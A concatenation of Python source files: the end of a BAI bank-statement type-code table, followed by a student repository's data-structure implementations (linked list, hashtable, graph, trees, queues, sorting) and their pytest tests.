TypeCode('567', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item Fee'),
TypeCode('568', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item Adjustment'),
TypeCode('570', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ZBA Debits'),
TypeCode('574', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative ZBA Debits'),
TypeCode('575', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit'),
TypeCode('577', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit Transfer'),
TypeCode('578', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit Adjustment'),
TypeCode('580', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Controlled Disbursing Debits'),
TypeCode('581', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Controlled Disbursing Debit'),
TypeCode('583', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid – Early Amount'),
TypeCode('584', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid – Later Amount'),
TypeCode('585', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Disbursing Funding Requirement'),
TypeCode('586', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'FRB Presentment Estimate (Fed Estimate)'),
TypeCode('587', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Late Debits (After Notification)'),
TypeCode('588', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid-Last Amount'),
TypeCode('590', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total DTC Debits'),
TypeCode('594', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ATM Debits'),
TypeCode('595', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ATM Debit'),
TypeCode('596', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total APR Debits'),
TypeCode('597', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ARP Debit'),
TypeCode('601', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Estimated Total Disbursement'),
TypeCode('602', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Adjusted Total Disbursement'),
TypeCode('610', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Funds Required'),
TypeCode('611', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Wire Transfers Out- CHF'),
TypeCode('612', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Wire Transfers Out – FF'),
TypeCode('613', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debit – CHF'),
TypeCode('614', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debit – FF'),
TypeCode('615', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Federal Reserve Bank – '
'Commercial Bank Debit'),
TypeCode('616', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Federal Reserve Bank – Commercial Bank Debit'),
TypeCode('617', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Securities Purchased – CHF'),
TypeCode('618', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Securities Purchased – FF'),
TypeCode('621', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits – CHF'),
TypeCode('622', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Broker Debit'),
TypeCode('623', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits – FF'),
TypeCode('625', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits'),
TypeCode('626', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Fed Funds Purchased'),
TypeCode('627', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Fed Funds Purchased'),
TypeCode('628', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Cash Center Debits'),
TypeCode('629', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Center Debit'),
TypeCode('630', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Adjustments'),
TypeCode('631', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Debit Adjustment'),
TypeCode('632', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Trust Debits'),
TypeCode('633', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Trust Debit'),
TypeCode('634', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'YTD Adjustment Debit'),
TypeCode('640', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Escrow Debits'),
TypeCode('641', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Escrow Debit'),
TypeCode('644', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Back Value Debit'),
TypeCode('646', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Transfer Calculation Debit'),
TypeCode('650', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Investments Purchased'),
TypeCode('651', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Investment purchased'),
TypeCode('654', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest Debit'),
TypeCode('655', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Investment Interest Debits'),
TypeCode('656', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Sweep Principal Buy'),
TypeCode('657', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Futures Debit'),
TypeCode('658', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Principal Payments Debit'),
TypeCode('659', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest Adjustment Debit'),
TypeCode('661', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Account Analysis Fee'),
TypeCode('662', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Correspondent Collection Debit'),
TypeCode('663', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Correspondent Collection Adjustment'),
TypeCode('664', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Loan Participation'),
TypeCode('665', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Intercept Debits'),
TypeCode('666', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Currency and Coin Shipped'),
TypeCode('667', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Food Stamp Letter'),
TypeCode('668', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Food Stamp Adjustment'),
TypeCode('669', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Clearing Settlement Debit'),
TypeCode('670', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Back Value Debits'),
TypeCode('672', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Back Value Adjustment'),
TypeCode('673', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Customer Payroll'),
TypeCode('674', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Statement Recap'),
TypeCode('676', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Savings Bond Letter or Adjustment'),
TypeCode('677', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Treasury Tax and Loan Debit'),
TypeCode('678', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Transfer of Treasury Debit'),
TypeCode('679', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Government Checks Cash Letter Debit'),
TypeCode('681', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Government Check Adjustment'),
TypeCode('682', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Postal Money Order Debit'),
TypeCode('683', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Postal Money Order Adjustment'),
TypeCode('684', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Debit'),
TypeCode('685', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Universal Debits'),
TypeCode('686', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Adjustment'),
TypeCode('687', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Fine-Sort Cash Letter Debit'),
TypeCode('688', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Fine-Sort Adjustment'),
TypeCode('689', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'FRB Freight Payment Debits'),
TypeCode('690', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Debits'),
TypeCode('691', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Universal Debit'),
TypeCode('692', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Freight Payment Debit'),
TypeCode('693', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Itemized Debit Over $10,000'),
TypeCode('694', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposit Reversal'),
TypeCode('695', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposit Correction Debit'),
TypeCode('696', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Regular Collection Debit'),
TypeCode('697', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative** Debits'),
TypeCode('698', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Fees'),
TypeCode('699', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Debit'),
TypeCode('701', None, TypeCodeLevel.status, 'Principal Loan Balance'),
TypeCode('703', None, TypeCodeLevel.status, 'Available Commitment Amount'),
TypeCode('705', None, TypeCodeLevel.status, 'Payment Amount Due'),
TypeCode('707', None, TypeCodeLevel.status, 'Principal Amount Past Due'),
TypeCode('709', None, TypeCodeLevel.status, 'Interest Amount Past Due'),
TypeCode('720', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Loan Payment'),
TypeCode('721', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Interest'),
TypeCode('722', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Principal'),
TypeCode('723', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Escrow'),
TypeCode('724', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Late Charges'),
TypeCode('725', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Buydown'),
TypeCode('726', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Misc. Fees'),
TypeCode('727', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Deferred Interest Detail'),
TypeCode('728', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Service Charge'),
TypeCode('760', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Loan Disbursement'),
TypeCode('890', TypeCodeTransaction.misc, TypeCodeLevel.detail, 'Contains Non-monetary Information'),
]
TypeCodes = {
type_code.code: type_code
for type_code in TypeCodes
}
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_fizzbuzz_tree.py | <filename>python/tests/test_fizzbuzz_tree.py<gh_stars>0
from code_challenges.fizzbuzz_tree.fizzbuzz_tree import Ktree, Node, fizz_buzz
# def test_node_has_value():
# node = Node("apple")
# assert node.value == "apple"
# def test_create_k_tree():
# tree = KTree()
# assert tree
# def test_fizz_buzz():
# one = Node(1)
# two = Node(2)
# three = Node(3)
# four = Node(4)
# five = Node(5)
# six = Node(6)
# seven = Node(7)
# eight = Node(8)
# one.children = [two,five]
# two.children = [three, four]
# five.children = [six, seven, eight]
# kt = Ktree()
# kt.root = one
# actual = fizz_buzz(kt)
# expected = kt.breadth(kt)
# assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_business_trip.py | from code_challenges.graph_business_trip.graph_business_trip import business_trip
from code_challenges.graph.graph import Graph, Vertex
def test_business_one():
graph = Graph('bidirectional')
boston = graph.add_node('Boston')
seattle = graph.add_node('Seattl')
la = graph.add_node('LA')
sf = graph.add_node('SF')
chi = graph.add_node('CHI')
ny = graph.add_node('NY')
graph.add_edge(boston, ny, 82)
graph.add_edge(boston, chi, 90)
graph.add_edge(ny, chi, 42)
graph.add_edge(ny, seattle, 200)
graph.add_edge(ny, la, 225)
graph.add_edge(ny, sf, 230)
graph.add_edge(chi, seattle, 175)
graph.add_edge(seattle, sf, 85)
graph.add_edge(sf, la, 85)
cities = [boston, ny,la]
actual = business_trip(graph, cities)
expected = (True, 307)
assert actual == expected
def test_business_two():
graph = Graph('bidirectional')
pandora = graph.add_node('Pandora')
arendelle = graph.add_node('Arendelle')
metroville = graph.add_node('Metroville')
monstroplolis = graph.add_node('Monstroplolis')
narnia = graph.add_node('Narnia')
naboo = graph.add_node('Naboo')
graph.add_edge(pandora, arendelle, 150)
graph.add_edge(pandora, metroville, 82)
graph.add_edge(arendelle, metroville, 99)
graph.add_edge(arendelle, monstroplolis, 42)
graph.add_edge(metroville, monstroplolis, 105)
graph.add_edge(metroville, narnia, 37)
graph.add_edge(metroville, naboo, 26)
graph.add_edge(naboo, narnia, 250)
graph.add_edge(monstroplolis, naboo, 73)
cities = [narnia, arendelle, naboo]
actual = business_trip(graph, cities)
expected = (False, 0)
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashtable/hashtable.py | from code_challenges.linked_list.linked_list import LinkedList, Node
class Hashtable:
def __init__(self, size=1024):
self.size = size
self._bucket = [None] * size
def add(self, key, value):
index = self.hash(key)
if not self._bucket[index]:
self._bucket[index] = LinkedList()
self._bucket[index].append_item([key,value])
def get(self, key):
index = self.hash(key)
bucket = self._bucket[index]
if not bucket:
raise KeyError("Key not found", key)
current = bucket.head
while current:
if current.data[0] == key:
return current.data[1]
raise KeyError("Key not found", key)
def contains(self, key):
index = self.hash(key)
bucket = self._bucket[index]
if bucket is None:
return False
current = bucket.head
while current:
if current.data[0] == key:
return True
current = current.next
return None
def hash(self, key):
sum = 0
for char in key:
sum += ord(char)
sum *= 599
index = sum % len(self._bucket)
return index
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/breadth_first/breadth_first.py | <reponame>everydaytimmy/data-structures-and-algorithms<filename>python/code_challenges/breadth_first/breadth_first.py<gh_stars>0
class Node:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
class BinaryTree:
def __init__(self):
self.root = None
def add(self, value):
if not self.root:
self.root = Node(value)
return
def walk(root):
if not root:
return
if not root.left:
root.left = Node(value)
return
if root.left and not root.right:
root.right = Node(value)
return
walk(root.left)
walk(root.right)
walk(self.root)
@staticmethod
def breadth(tree = None):
list = []
queue = Queue()
queue.enqueue(tree.root)
if not tree:
return []
while queue.peek():
node = queue.dequeue()
list.append(node.value)
if node.left:
queue.enqueue(node.left)
if node.right:
queue.enqueue(node.right)
return list
class Queue:
def __init__ (self):
self.front = None
self.rear = None
def enqueue(self, value):
if self.front is None:
self.front = self.back = QNode(value)
else:
self.back.next = QNode(value)
def dequeue(self):
if self.front is None:
return
ret = self.front.value
self.front = self.front.next
return ret
def is_empty(self):
return self.front is None
def peek(self):
if self.front:
return self.front.value
class QNode:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_quick_sort.py | from code_challenges.quick_sort.quick_sort import partition, quick_sort
def test_quick():
assert quick_sort
def test_quick_sort():
array = [ 10, 7, 8, 9, 1, 5 ]
actual = quick_sort(0, len(array) - 1, array)
expected = [1,5,7,8,9,10]
assert actual == expected
def test_quick1():
array = [8,4,23,42,16,15]
actual = quick_sort(0, len(array) - 1, array)
expected = [4,8,15,16,23,42]
assert actual == expected
def test_quick2():
array = [3,4,12,42,-8,15]
actual = quick_sort(0, len(array) - 1, array)
expected = [-8,3,4,12,15,42]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_multi-bracket-validation.py | <gh_stars>0
from code_challenges.multi_bracket_validation.multi_bracket_validation import (multi_bracket_validation)
def test_one():
string = "{}{Code}[Fellows](())"
actual = multi_bracket_validation(string)
expected = True
assert actual == expected
def test_two():
string = "{{}}}}"
actual = multi_bracket_validation(string)
expected = False
assert actual == expected
def test_three():
string = "(){}[]"
actual = multi_bracket_validation(string)
expected = True
assert actual == expected
def test_four():
string = "{"
actual = multi_bracket_validation(string)
expected = False
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hashtable.py | from code_challenges.hashtable.hashtable import Hashtable
def text_exists() :
assert Hashtable
def test_add():
ht = Hashtable()
actual = ht.add('rum ham', 11)
expected = None
assert actual == expected
def test_get_value():
ht = Hashtable()
ht.add('rum ham', 6)
actual = ht.get('rum ham')
expected = 6
assert actual == expected
def test_hash():
ht = Hashtable()
actual = ht.hash('rum ham')
assert 0 <= actual <= 1024
def test_contains():
ht = Hashtable()
ht.add('rum ham', 6)
actual = ht.contains('toe knife')
expected = False
assert actual == expected
# def test_collision():
# ht = Hashtable()
# ht.add('rum ham', 6)
# ht.add('toe knife', 6)
# one = ht.get('rum ham')
# two = ht.get('toe knife')
# assert one != two
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/merge_sort/merge_sort.py | def merge_sort(list):
n = len(list)
if n <= 1:
return list
if n > 1:
mid = n//2
left = list[0:mid]
right = list[mid:n]
merge_sort(left)
merge_sort(right)
return merge(left,right,list)
def merge(left, right, list):
i = 0
j = 0
k = 0
while i < len(left) and j < len(right):
if left[i] <= right[j]:
list[k] = left[i]
i = i+1
else:
list[k] = right[j]
j = j+1
k = k+1
if i == len(left):
list[k:] = right[j:]
else:
list[k:] = left[i:]
return list
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_breadth_first_graph.py | <filename>python/tests/test_breadth_first_graph.py<gh_stars>0
from code_challenges.depth_first_graph.depth_first_graph import depth_traversal, Stack, Node
from code_challenges.graph.graph import Graph, Vertex
def test_depth_traversal_exists():
assert depth_traversal
def test_depth_traversal_one():
graph = Graph()
boston = graph.add_node('Boston')
seattle = graph.add_node('Seattle')
la = graph.add_node('LA')
sf = graph.add_node('SF')
chi = graph.add_node('CHI')
ny = graph.add_node('NY')
graph.add_edge(boston, ny, 82)
graph.add_edge(boston, chi, 90)
graph.add_edge(ny, chi, 42)
graph.add_edge(ny, seattle, 200)
graph.add_edge(ny, la, 225)
graph.add_edge(ny, sf, 230)
graph.add_edge(chi, seattle, 175)
graph.add_edge(seattle, sf, 85)
graph.add_edge(sf, la, 85)
actual = depth_traversal(boston, graph)
expected = [boston, chi, seattle, sf, la, ny]
assert actual == expected
def test_depth_traversal_two():
graph = Graph()
city = graph.add_node('Boston')
town = graph.add_node('Seattle')
place = graph.add_node('LA')
graph.add_edge(city, town, 82)
graph.add_edge(town, place, 90)
graph.add_edge(city, place, 42)
actual = depth_traversal(city, graph)
expected = [city, place, town]
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hashmap_left_join.py | <reponame>everydaytimmy/data-structures-and-algorithms<gh_stars>0
from code_challenges.hashmap_left_join.hashmap_left_join import hashmap_left_join
from code_challenges.hashtable.hashtable import Hashtable
def test_exists():
assert hashmap_left_join
def test_left_join():
ht1 = Hashtable()
ht2 = Hashtable()
ht1.add('fond', 'enamored')
ht1.add('wrath', 'anger')
ht1.add('diligent', 'employed')
ht2.add('fond', 'averse')
ht2.add('wrath', 'delight')
ht2.add('happy', 'follow')
actual = hashmap_left_join(ht1, ht2)
expected = [
['fond', 'enamored', 'averse'],
['wrath', 'anger', 'delight'],
['diligent', 'employed', None]
]
for entry in expected:
assert entry in actual
def test_left_join_one_empty():
ht1 = Hashtable()
ht2 = Hashtable()
ht1.add('fond', 'enamored')
ht1.add('wrath', 'anger')
actual = hashmap_left_join(ht1, ht2)
expected = [
['fond', 'enamored', None],
['wrath', 'anger', None],
]
for entry in expected:
assert entry in actual
def test_left_join_both_empty():
ht1 = Hashtable()
ht2 = Hashtable()
actual = hashmap_left_join(ht1, ht2)
expected = []
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_hash_repeat.py | <gh_stars>0
from code_challenges.hashmap_repeated.hashmap_repeated import word_repeat
from code_challenges.hashtable.hashtable import Hashtable
def test_word_repeat():
assert word_repeat
def test_string():
actual = word_repeat("Once upon a time, there was a brave princess who...")
expected = 'a'
assert actual == expected
def test_string_1():
actual = word_repeat("It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness, it was the epoch of belief, it was the epoch of incredulity, it was the season of Light, it was the season of Darkness, it was the spring of hope, it was the winter of despair, we had everything before us, we had nothing before us, we were all going direct to Heaven, we were all going direct the other way – in short, the period was so far like the present period, that some of its noisiest authorities insisted on its being received, for good or for evil, in the superlative degree of comparison only...")
expected = 'it'
assert actual == expected
def test_string_2():
actual = word_repeat("It was a queer, sultry summer, the summer they electrocuted the Rosenbergs, and I didn’t know what I was doing in New York...")
expected = 'summer'
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/queueWithStacks/queueWithStacks.py | class Stack:
def __init__(self):
self.top = None
def push(self, value):
self.top = Node (value, self.top)
def pop(self):
value = self.top.value
self.top = self.top.next
return value
def enqueue(self, value):
self.top = Node (value, self.top)
def dequeue(self):
prev = None
current = self.top
while(current is not None):
next = current.next
current.next = prev
prev = current
current = next
self.top = prev
value = self.top.value
self.top = self.top.next
return value
class Node:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_linked_list.py | <reponame>everydaytimmy/data-structures-and-algorithms
from code_challenges.linked_list.linked_list import LinkedList, Node
def test_import():
assert LinkedList
def test_insert():
list = LinkedList(Node("Buddy"))
assert list.head.data == "Buddy"
list.insert('Guy')
list.insert('Friend')
assert list.head.data == 'Friend'
def test_append_end():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
actual = list.head.data
expected = "rock"
assert actual == expected
def test_includes():
list = LinkedList()
list.insert('rubber')
list.insert('baby')
list.insert('buggy')
list.insert('bumpers')
actual = list.includes('baby')
expected = True
assert actual == expected
def test_not_includes():
list = LinkedList()
list.insert('rubber')
list.insert('baby')
list.insert('buggy')
list.insert('bumpers')
actual = list.includes('rad')
expected = False
assert actual == expected
def test_head():
node = Node('rubber')
actual = node.next
expected = None
assert actual == expected
def test_to_string():
list = LinkedList()
list.insert("c")
list.insert("b")
list.insert("a")
actual = list.__str__()
expected = "{ a } -> { b } -> { c } -> None"
assert actual == expected
def test_values():
list = LinkedList()
list.insert('bumpers')
list.insert('buggy')
list.insert('baby')
list.insert('rubber')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_before_value():
list = LinkedList()
list.insert('bumpers')
list.insert('buggy')
list.insert('rubber')
list.inject_b('buggy', 'baby')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_after_value():
list = LinkedList()
list.insert('bumpers')
list.insert('baby')
list.insert('rubber')
list.inject_a('baby', 'buggy')
actual = list.find_all()
expected = ['rubber', 'baby', 'buggy', 'bumpers']
assert actual == expected
def test_add_after_value1():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
list.inject_a('scissors', 'cannon')
actual = list.find_all()
expected = ['rock', 'paper', 'scissors', 'cannon', 'machinegun']
assert actual == expected
def test_x_fromend():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(2)
expected = 'paper'
assert actual == expected
def test_x_fromend10():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(10)
expected = 'Exception'
assert actual == expected
def test_x_fromend0():
list = LinkedList()
list.append_item('rock')
list.append_item('paper')
list.append_item('scissors')
list.append_item('machinegun')
actual = list.x_fromend(0)
expected = 'machinegun'
assert actual == expected
def test_x_fromend_one_item():
list = LinkedList()
list.append_item('machinegun')
actual = list.x_fromend(0)
expected = 'machinegun'
assert actual == expected
def test_x_fromend_neg():
list = LinkedList()
list.append_item('machinegun')
actual = list.x_fromend(-2)
expected = 'Exception'
assert actual == expected
def test_zip():
lista = LinkedList()
listb = LinkedList()
lista.append_item('A')
lista.append_item('B')
listb.append_item('1')
listb.append_item('2')
answer = lista.zip_list(listb)
actual = answer.find_all()
expected = ['A', '1', 'B', '2']
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/stacks_and_queues/stacks_and_queues.py | <gh_stars>0
from code_challenges.stacks_and_queues.invalid_error import InvalidOperationError
class Stack:
def __init__(self):
self.top = None
def push(self, value):
self.top = Node (value, self.top)
def pop(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
value = self.top.value
self.top = self.top.next
return value
def is_empty(self):
return self.top is None
def peek(self):
if not self.top:
raise InvalidOperationError("Method not allowed on empty collection")
return self.top.value
class Queue:
def __init__ (self):
self.front = None
self.rear = None
def enqueue(self, value):
if self.rear:
self.rear.next = Node(value)
self.rear = self.rear.next
else:
self.rear = Node(value)
self.front = self.rear
def dequeue(self):
if not self.front:
raise InvalidOperationError("Method not allowed on empty collection")
old_front = self.front
self.front = self.front.next
old_front.next = None
def is_empty(self):
return self.front is None
def peek(self):
if self.rear:
return self.rear.value
else:
raise InvalidOperationError("Method not allowed on empty collection")
class Node:
def __init__(self, value, next = None):
self.value = value
self.next = next
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/graph/graph.py | <reponame>everydaytimmy/data-structures-and-algorithms
class Vertex:
def __init__(self, value):
self.value = value
class Graph:
def __init__(self, kind='single direction'):
self.adjacency_list = {}
self.type= kind
def add_node(self, value):
vertex = Vertex(value)
if vertex not in self.adjacency_list:
self.adjacency_list[vertex] = {}
return vertex
raise Exception('Node already in list')
def get_nodes(self):
return tuple(self.adjacency_list.keys())
def size(self):
if len(self.adjacency_list) == 0:
return None
return len(self.adjacency_list)
def add_edge(self, start_vertex, end_vertex, weight=0):
if start_vertex not in self.adjacency_list:
raise KeyError("Start Vertex not found in graph")
if end_vertex not in self.adjacency_list:
raise KeyError("End Vertex not found in graph")
self.adjacency_list[start_vertex][end_vertex] = weight
if self.type == 'bidirectional':
self.adjacency_list[end_vertex][start_vertex] = weight
def get_neighbors(self, vertex):
return self.adjacency_list[vertex]
# def add_edge(self, start_vertex, end_vertex, weight=0):
# edge = Edge(end_vertex, weight)
# self.adjacency_list[start_vertex].append(edge)
# class Edge:
# def __init__(self, vertex, weight):
# self.vertex = vertex
# self.weight = weight
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashmap_left_join/hashmap_left_join.py | <reponame>everydaytimmy/data-structures-and-algorithms
from code_challenges.hashtable.hashtable import Hashtable
def hashmap_left_join(ht1, ht2):
answer = []
for bucket in ht1._bucket:
if bucket:
current = bucket.head
while current:
current_key = current.data[0]
current_value = current.data[1]
pairs = [current_key, current_value]
if ht2.contains(current_key):
pairs.append(ht2.get(current_key))
else:
pairs.append(None)
answer.append(pairs)
current = current.next
return answer
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/linked_list/linked_list.py | <filename>python/code_challenges/linked_list/linked_list.py
class LinkedList:
def __init__(self, head=None):
self.head = head
def __iter__(self):
def value_generator():
current = self.head
while current:
yield current.value
current= current.next
return value_generator()
def __str__(self):
out = ""
for value in self:
out += f"[ {value} ] ->"
return out + "None"
def __len__(self):
return len(list(iter(self)))
def __eq__(self, other):
return list(self) == list(other)
def insert(self, data):
self.head = Node(data, self.head)
def append_item(self, data):
new_node = Node(data)
current = self.head
if not self.head:
self.head = new_node
return
while current.next:
current = current.next
current.next = new_node
def includes(self, data):
current = self.head
while current:
if current.data == data:
return True
current = current.next
return False
def find_all(self):
values = []
current = self.head
while current:
values.append(current.data)
current = current.next
return values
def __str__(self):
string = ""
current = self.head
while current:
string += "{ " + current.data + " } -> "
current = current.next
string += 'None'
return string
def inject_b(self, index, value):
current = self.head
while current:
if current.next.data == index:
old_next = current.next
current.next = Node(value, old_next)
break
current = current.next
def inject_a(self, index, value):
current = self.head
while current:
if current.data == index:
current.next = Node(value, current.next)
break
else:
current = current.next
def x_fromend(self, index):
temp = []
current = self.head
while current:
temp.append(current.data)
current = current.next
temp[::-1]
if index > len(temp):
return 'Exception'
if index < 0:
return 'Exception'
return temp[index-1]
def zip_list(lista,listb):
current_a = lista.head
current_b = listb.head
while current_a and current_b:
old_next_a = current_a.next
old_next_b = current_b.next
current_a.next = current_b
if current_a != None:
current_b.next = old_next_a
current_a = old_next_a
current_b = old_next_b
else:
break
return lista
class Node:
def __init__(self, data, next=None):
self.data = data
self.next = next
try:
current = self.head
for _ in range(1, self.length-num):
current = current.next
return current.value
except: print('Something went wrong, please try again')
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_tree.py | <filename>python/tests/test_tree.py
import pytest
from code_challenges.tree.tree import Node, BinaryTree, BinarySearchTree
def test_node_has_value():
node = Node("apple")
assert node.value == "apple"
def test_node_has_left_of_none():
node = Node("apple")
assert node.left is None
def test_node_has_right_of_none():
node = Node("apple")
assert node.right is None
def test_create_binary_tree():
tree = BinaryTree()
assert tree
def test_binary_tree_has_root():
tree = BinaryTree()
assert tree.root is None
def test_create_binary_search_tree():
tree = BinarySearchTree()
assert tree
def test_binary_search_tree_has_root():
tree = BinarySearchTree()
assert tree.root is None
def test_add_to_empty_bst():
tree = BinarySearchTree()
tree.add(5)
actual = tree.root.value
expected = 5
assert actual == expected
def test_add_to_empty_bst_again():
tree = BinarySearchTree()
tree.add(7)
actual = tree.root.value
expected = 7
assert actual == expected
def test_add_lesser_to_not_empty_bst():
tree = BinarySearchTree()
tree.add(5)
tree.add(2)
actual = tree.root.left.value
expected = 2
assert actual == expected
def test_add_greater_to_not_empty_bst():
tree = BinarySearchTree()
tree.add(5)
tree.add(7)
